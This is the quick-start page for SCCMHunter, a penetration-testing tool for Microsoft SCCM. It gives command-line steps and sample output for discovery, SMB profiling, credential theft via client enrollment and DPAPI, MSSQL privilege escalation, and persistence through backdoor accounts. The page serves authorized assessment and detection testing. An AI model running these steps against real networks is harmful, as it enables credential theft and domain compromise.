Skip to main content
This guide walks you through a complete SCCM assessment workflow using SCCMHunter, from initial discovery to exploitation and post-exploitation activities.
This quick start assumes you have already completed the installation process and have valid domain credentials.

Assessment Workflow

Step 1: LDAP Discovery

Start by discovering SCCM infrastructure in the target domain: 
python3 sccmhunter.py find -d contoso.com -dc-ip 192.168.1.10 -u lowpriv -p password

[+] Beginning SCCM Infrastructure Discovery
[+] Checking for Schema Extension Objects
    [+] Found System Management Container
    [+] DACL Analysis Complete - 3 computers with FullControl
[+] Checking for Management Points
    [+] Found Management Point: SCCM01.contoso.com
    [+] Found Management Point: SCCM02.contoso.com
[+] Checking for Distribution Points
    [+] Found PXE-Enabled DP: PXE01.contoso.com
[+] Keyword Search Results
    [+] Found 15 objects containing 'SCCM'
    [+] Found 8 objects containing 'MECM'

Step 2: SMB Profiling

Profile the discovered targets to understand their roles and attack surface: 
python3 sccmhunter.py smb -d contoso.com -u lowpriv -p password

[+] Beginning SMB Profiling
[+] Target: SCCM01.contoso.com
    [+] SMB Signing: Disabled
    [+] SCCM Role: Site Server
    [+] MSSQL Service: Running
    [+] SMS Provider: True
    [+] Default Shares: SMS_DP$, SMS_PKG$
[+] Target: PXE01.contoso.com
    [+] SMB Signing: Enabled
    [+] SCCM Role: Distribution Point
    [+] PXE Variables: Available
    [+] Default Shares: REMINST

Step 3: Target Analysis

Review the discovery and profiling results to identify attack vectors: 
python3 sccmhunter.py show -j results.json

Target Prioritization

High Priority Targets:
  • Site Servers with SMB signing disabled
  • Management Points with exposed HTTP services
  • Distribution Points with PXE variables
  • MSSQL instances with site database access
Attack Vectors to Consider:
  • HTTP client enrollment for credential theft
  • MSSQL relay attacks for privilege escalation
  • DPAPI extraction from Distribution Points
  • SMB relay attacks against unsigned targets

Step 4: Exploitation

Option A: HTTP Client Enrollment

Target HTTP-based client enrollment for credential extraction: 
python3 sccmhunter.py http -d contoso.com -u lowpriv -p password -target SCCM01.contoso.com

Option B: MSSQL Privilege Escalation

Leverage MSSQL access for privilege escalation: 
python3 sccmhunter.py mssql -d contoso.com -u lowpriv -p password -target SCCM01.contoso.com

Option C: DPAPI Secret Extraction

Extract Network Access Account credentials: 
python3 sccmhunter.py dpapi -d contoso.com -u lowpriv -p password -target PXE01.contoso.com

Step 5: Post-Exploitation

If you’ve successfully gained administrative access, use the admin module: 
python3 sccmhunter.py admin -u administrator -p newpassword -ip SCCM01.contoso.com

Common Workflows

Objective: Gain domain admin through SCCM compromise
  1. Discovery: find module to map SCCM infrastructure
  2. Profiling: smb module to identify attack surface
  3. Exploitation: http or mssql modules for initial access
  4. Escalation: admin module for privilege escalation
  5. Persistence: Create backdoor accounts and maintain access
Objective: Assess SCCM security posture
  1. Enumeration: Comprehensive discovery with all modules
  2. Vulnerability Assessment: Identify misconfigurations and weaknesses
  3. Proof of Concept: Demonstrate exploitability without damage
  4. Documentation: Export results for detailed reporting
  5. Remediation: Provide specific hardening recommendations
Objective: Test detection capabilities
  1. Baseline: Establish normal SCCM activity patterns
  2. Attack Simulation: Execute controlled attack scenarios
  3. Detection Analysis: Verify security monitoring effectiveness
  4. Tuning: Adjust detection rules and monitoring systems
  5. Validation: Re-test to confirm improved detection

Troubleshooting Common Issues

Symptoms: “Authentication failed” or “Access denied” errorsSolutions:
  • Verify credentials are correct and account is not locked
  • Check domain name format (use FQDN)
  • Try different authentication methods (-k for Kerberos)
  • Ensure network connectivity to domain controller
Symptoms: Empty results from find moduleSolutions:
  • Verify you’re targeting the correct domain
  • Check if SCCM is actually deployed in the environment
  • Try the -resolve flag for nested group enumeration
  • Confirm you have appropriate LDAP read permissions
Symptoms: SMB profiling fails or times outSolutions:
  • Check SMB signing requirements and compatibility
  • Verify network connectivity and firewall rules
  • Try reducing thread count with -threads parameter
  • Use specific target lists instead of broad scanning

Next Steps

LDAP Enumeration

Deep dive into LDAP discovery techniques and advanced options

HTTP Exploitation

Learn advanced HTTP client enrollment attack techniques

MSSQL Attacks

Master MSSQL-based privilege escalation methods

Post-Exploitation

Explore administrative access and lateral movement capabilities

Best Practices

Operational Security

  • Test in Labs First: Always validate techniques in controlled environments
  • Minimize Impact: Use read-only operations when possible during assessments
  • Document Everything: Maintain detailed logs of activities and findings
  • Coordinate with Teams: Communicate with IT and security teams during authorized testing
  • Clean Up: Remove any temporary artifacts created during testing